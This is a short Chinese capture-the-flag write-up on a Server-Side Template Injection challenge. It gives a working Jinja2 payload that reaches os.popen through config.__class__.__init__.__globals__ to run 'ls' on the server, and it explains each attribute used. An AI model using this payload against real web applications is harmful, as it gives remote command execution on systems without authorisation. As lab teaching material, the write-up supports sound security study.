打开题目，看到还是SSTI漏洞，
首先还是让我们使用flag构造参数，所以就是?flag={{XXXX}},再看了一下config

看了一下，没见什么特殊的东西，题目说了时SSIT漏洞，那么利用漏洞先ls查看一下

/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}
##__class__：用来查看变量所属的类，根据前面的变量形式可以得到其所属的类。
##__init__             初始化类，返回的类型是function
##__globals__[]          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
##os.popen() 方法用于从一个命令打开一个管道。
##open() 方法用于打开一个文件，并返回文件对象